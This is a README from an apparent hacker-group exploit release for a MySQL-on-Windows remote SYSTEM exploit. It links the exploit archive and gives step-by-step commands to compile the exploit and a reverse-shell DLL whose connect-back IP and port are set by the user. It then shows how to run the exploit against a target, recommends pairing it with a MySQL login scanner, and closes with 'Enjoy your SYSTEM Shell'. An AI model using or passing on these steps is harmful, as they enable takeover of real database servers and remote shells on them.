50 lines
No EOL
1.6 KiB
Text
50 lines
No EOL
1.6 KiB
Text
***
|
|
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE
|
|
***
|
|
|
|
Attached is the MySQL Windows Remote Exploit (post-auth, udf
|
|
technique) including the previously released mass scanner.
|
|
The exploit is mirrored at the farlight website http://www.farlight.org.
|
|
|
|
Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
|
|
All owned By Kingcope
|
|
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23073.tar.gz
|
|
|
|
Installation Instructions
|
|
=============================
|
|
|
|
1. Install mysql client libraries and headers (UNIX)
|
|
RedHat based (e.g. CentOS):
|
|
yum install mysql mysql-devel
|
|
|
|
2. Compile the standalone exploit
|
|
issue commands:
|
|
gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient
|
|
|
|
3. Compile the reverse shell payload (this is required!)
|
|
required because the connect back ip and port are hardcoded in the dll:
|
|
use mingw on windows or wine
|
|
change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have
|
|
to change the port in mysqljackpot.c too (default port: 443).
|
|
issue commands:
|
|
set PATH=%PATH%;c:\MinGW\bin\
|
|
gcc -c payload.c
|
|
gcc -shared -o payload.dll payload.o -lws2_32
|
|
copy the payload.dll into the mysqljackpot exploit folder
|
|
|
|
4. Run The Exploit
|
|
./mysqljackpot -u root -p "" -t 99.99.99.99
|
|
A valid database admin user and his password are required
|
|
for the exploit to work properly.
|
|
This exploit is especially useful when used in connection
|
|
to a MySQL login scanner, see scanner/README.mysql inside this package.
|
|
Be sure to have the firewall open on the desired reverse port
|
|
on the attacking machine.
|
|
|
|
5. Enjoy your SYSTEM Shell!!!
|
|
|
|
|
|
Yours Sincerely,
|
|
|
|
-- Kingcope |